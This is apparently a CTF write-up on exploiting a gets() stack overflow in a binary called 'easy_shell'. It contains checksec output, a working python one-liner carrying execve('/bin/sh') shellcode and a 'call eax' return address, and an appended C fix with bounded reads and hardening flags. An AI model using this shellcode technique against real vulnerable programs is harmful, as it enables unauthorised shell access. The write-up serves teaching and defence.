It was a very simple problem. First I fired up the binary in gdb to examine what the program does. There was a “do_stuff” function that called the vulnerable “gets” function. Using that I got control over EIP after overflowing 54 bytes. To see the protections of the binary I ran checksec:
RELRO           STACK CANARY      NX            PIE             RPATH      RUNPATH      FILE
No RELRO        No canary found   NX disabled   No PIE          No RPATH   No RUNPATH   easy_shell
As NX was disabled, I thought of running shellcode on the stack and pointing EIP at it. But for that I first thought of chaining gadgets to point EIP to the shellcode, and wasted a lot of time. Later I saw that the return value from “gets” (left in EAX) was the pointer to the buffer which held the shellcode. Then I searched for a “call eax” instruction, which I found using the rp++ tool, and exploited the binary.
Here is my exploit:
➜ python -c 'print "\xeb\x18\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xb0\x0b\xcd\x80\xe8\xe3\xff\xff\xff/bin/sh" + "A"*16 + "\xe3\x83\x04\x08"' > inp
➜ cat inp /dev/stdin | ./easy_shell
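As an added note on the root cause, not part of the original write-up or the challenge binary: the bug is an unbounded gets() into a stack buffer, and the fix is a bounded read that drains any excess. The 50-byte buffer size and the do_stuff() shape are my assumptions (54 bytes of filler reaching EIP fits a 50-byte buffer plus 4 bytes of saved EBP); the input stream is constructed from the write-up's payload layout and a sentinel stands in for the saved return address.

```c
#include <stdio.h>
#include <string.h>

/* The write-up's do_stuff() reads into a fixed stack buffer with gets(),
 * which never checks a length, so the 54 filler bytes and the 4-byte
 * address run off the buffer into saved EBP and EIP. Assumed shape:
 *     char buf[50]; gets(buf);      (gets() was removed from C11) */

/* Bounded replacement: stores at most cap-1 bytes, strips the newline and
 * drains any excess so it cannot land anywhere else on the stack.
 * Returns the number of bytes stored, or -1 on EOF/error. */
long read_line_bounded(char *buf, size_t cap, FILE *in) {
    if (cap == 0 || fgets(buf, (int)cap, in) == NULL)
        return -1;
    size_t len = strcspn(buf, "\n");
    if (buf[len] == '\n') {
        buf[len] = '\0';
    } else {
        int c; /* line was longer than the buffer: discard the rest */
        while ((c = fgetc(in)) != EOF && c != '\n')
            ;
    }
    return (long)len;
}

/* Constructed input stream: the write-up's 54 filler bytes, the 4-byte
 * return address 0x080483e3 and a newline, served from a temp file. */
static FILE *overflowing_input(void) {
    char line[64];
    memset(line, 'A', 54);
    memcpy(line + 54, "\xe3\x83\x04\x08\n", 5);
    FILE *f = tmpfile();
    if (f == NULL) return NULL;
    fwrite(line, 1, 59, f);
    rewind(f);
    return f;
}

/* A sentinel placed right after a 50-byte buffer stands in for the saved
 * EBP/EIP. Returns 1 if the bounded read left it untouched and stored
 * exactly 49 bytes, 0 otherwise. */
int overflow_contained(void) {
    struct { char buf[50]; unsigned int sentinel; } frame;
    frame.sentinel = 0xdeadbeefu;
    FILE *in = overflowing_input();
    if (in == NULL) return 0;
    long n = read_line_bounded(frame.buf, sizeof frame.buf, in);
    fclose(in);
    return n == 49 && frame.sentinel == 0xdeadbeefu;
}
```

Rebuilding with -fstack-protector, -Wl,-z,noexecstack and PIE would also turn the checksec row above from all "No" to the mitigations the exploit relied on being absent.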